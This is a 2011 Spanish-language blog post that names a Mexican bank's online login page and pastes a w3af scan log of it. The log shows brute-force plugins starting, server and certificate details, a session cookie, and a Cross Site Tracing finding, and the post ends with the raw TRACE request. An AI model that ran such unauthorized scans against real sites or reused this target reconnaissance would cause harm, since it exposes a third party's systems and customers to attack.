viernes, 27 de mayo de 2011

Cross Site Tracing see.sbi.com.mx/invernet2000/Login.jsp

Saludos Mundo Libre.

Hay les dejo otra para su estudio.

https://see.sbi.com.mx/invernet2000/Login.jsp

[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.collectCookies
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.error500
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.getMails
[Thu 26 May 2011 10:02:05 PM CDT] Auto-enabling plugin: grep.lang
[Thu 26 May 2011 10:02:09 PM CDT] The page language is: es
[Thu 26 May 2011 10:02:10 PM CDT] The server header for the remote web server is: "IBM_HTTP_SERVER/1.3.19.6-PQ90262 Apache/1.3.20 (Unix)". This information was found in the request with id 15.
[Thu 26 May 2011 10:02:11 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:02:11 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:02:11 PM CDT] Found 1 URLs and 1 different points of injection.
[Thu 26 May 2011 10:02:11 PM CDT] The list of URLs is:
[Thu 26 May 2011 10:02:11 PM CDT] - https://see.sbi.com.mx/invernet2000/Login.jsp
[Thu 26 May 2011 10:02:11 PM CDT] The list of fuzzable requests is:
[Thu 26 May 2011 10:02:11 PM CDT] - https://see.sbi.com.mx/invernet2000/Login.jsp | Method: GET
[Thu 26 May 2011 10:02:11 PM CDT] The web application sent a persistent cookie.
[Thu 26 May 2011 10:02:11 PM CDT] This is the information about the SSL certificate used in the target site:
- Digest (SHA-1): F1:D9:65:32:E0:B3:92:49:1F:F8:82:4C:0C:83:1D:F7:6D:40:47:E6
- Digest (MD5): 1E:39:62:29:82:A3:A6:61:A6:BA:E1:23:87:FB:97:68
- Serial#: 52710929251855116405284257897386420621
- Version: 2
- Expired: No
- Subject:
- Issuer:
- PKey bits: 1024
- PKey type: RSA (6)
- Certificate dump:
-----BEGIN CERTIFICATE-----
MIIEuzCCBCSgAwIBAgIQJ6fBddWk0elq5ABYVwUpjTANBgkqhkiG9w0BAQUFADCB
ujEfMB0GA1UEChMWVmVyaVNpZ24gVHJ1c3QgTmV0d29yazEXMBUGA1UECxMOVmVy
aVNpZ24sIEluYy4xMzAxBgNVBAsTKlZlcmlTaWduIEludGVybmF0aW9uYWwgU2Vy
dmVyIENBIC0gQ2xhc3MgMzFJMEcGA1UECxNAd3d3LnZlcmlzaWduLmNvbS9DUFMg
SW5jb3JwLmJ5IFJlZi4gTElBQklMSVRZIExURC4oYyk5NyBWZXJpU2lnbjAeFw0w
OTA2MTAwMDAwMDBaFw0xMTA3MTAyMzU5NTlaMIHLMQswCQYDVQQGEwJNWDELMAkG
A1UECBMCREYxDzANBgNVBAcUBk1leGljbzEtMCsGA1UEChQkR3J1cG8gRmluYW5j
aWVybyBTY290aWFiYW5rIEludmVybGF0MSEwHwYDVQQLFBhEZXBhcnRhbWVudG8g
U2VndXJpZGFkIDUxMzAxBgNVBAsUKlRlcm1zIG9mIHVzZSBhdCB3d3cudmVyaXNp
Z24uY29tL3JwYSAoYykwNTEXMBUGA1UEAxQOc2VlLnNiaS5jb20ubXgwgZ8wDQYJ
KoZIhvcNAQEBBQADgY0AMIGJAoGBALPKfWK9E33CLYsQZJ9qreBlMj6r490j+BQO
FAOa4mhXWWRE2cQCVs/PEtUZYgH0eeMJ/Fveez+nEYMlZZIPiDm8lvsYNCrl/n2k
QOtJbTKaXMseEmUZpdtyALaGEIYlqabfbPFzxHAalAkL+AET37lCFay5MX6E3O8E
YSdgLc41AgMBAAGjggGtMIIBqTAJBgNVHRMEAjAAMAsGA1UdDwQEAwIFoDBEBgNV
HSAEPTA7MDkGC2CGSAGG+EUBBxcDMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3
LnZlcmlzaWduLmNvbS9ycGEwPAYDVR0fBDUwMzAxoC+gLYYraHR0cDovL1NWUklu
dGwtY3JsLnZlcmlzaWduLmNvbS9TVlJJbnRsLmNybDAoBgNVHSUEITAfBggrBgEF
BQcDAQYIKwYBBQUHAwIGCWCGSAGG+EIEATBxBggrBgEFBQcBAQRlMGMwJAYIKwYB
BQUHMAGGGGh0dHA6Ly9vY3NwLnZlcmlzaWduLmNvbTA7BggrBgEFBQcwAoYvaHR0
cDovL1NWUkludGwtYWlhLnZlcmlzaWduLmNvbS9TVlJJbnRsLWFpYS5jZXIwbgYI
KwYBBQUHAQwEYjBgoV6gXDBaMFgwVhYJaW1hZ2UvZ2lmMCEwHzAHBgUrDgMCGgQU
S2u5KJYGDLvQUjibKaxLB4shBRgwJhYkaHR0cDovL2xvZ28udmVyaXNpZ24uY29t
L3ZzbG9nbzEuZ2lmMA0GCSqGSIb3DQEBBQUAA4GBAK5kt0ugt0Bkin8hXOOjvFNS
ZJ2eKddx8EXR/fHjwUqjgZveUQcXy/k6aEz/pUcbkxOJS2BGkTUO31CAZqbEgzGG
HB9jtKOeeRbUUOoSaSLJeL9zy1H76Kys9bJHjks1QCa2QP5W6ZznSNLxNiAxJgBt
nCBtj2gHl4oszTB/quS4
-----END CERTIFICATE-----

[Thu 26 May 2011 10:02:12 PM CDT] The server header for the remote web server is: "IBM_HTTP_SERVER/1.3.19.6-PQ90262 Apache/1.3.20 (Unix)". This information was found in the request with id 15.
[Thu 26 May 2011 10:02:12 PM CDT] The URL "https://see.sbi.com.mx/invernet2000/" has the following allowed methods: GET, HEAD, OPTIONS, POST, TRACE. This information was found in the request with id 17.
[Thu 26 May 2011 10:02:12 PM CDT] The URL: "https://see.sbi.com.mx/invernet2000/Login.jsp" sent the cookie: "JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;Path=/". This information was found in the request with id 1.
[Thu 26 May 2011 10:03:26 PM CDT] Too many retries (2) while requesting: https://see.sbi.com.mx/invernet2000/
[Thu 26 May 2011 10:03:28 PM CDT] The web server at "https://see.sbi.com.mx/invernet2000/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 40.
[Thu 26 May 2011 10:03:30 PM CDT] The URL: "https://see.sbi.com.mx/invernet2000/Login.jsp" sent these cookies:
[Thu 26 May 2011 10:03:30 PM CDT] - JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3; Path=/
[Thu 26 May 2011 10:03:30 PM CDT] - JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;Path=/
[Thu 26 May 2011 10:03:30 PM CDT] Finished scanning process.


xst=xst

The web server at "https://see.sbi.com.mx/invernet2000/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 40

TRACE https://see.sbi.com.mx/invernet2000/ HTTP/1.1
Host: see.sbi.com.mx
Cookie: Path=/; JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net


Saludos Mundo Libre.
on

1 comentario:

Suscribirse a: Enviar comentarios (Atom)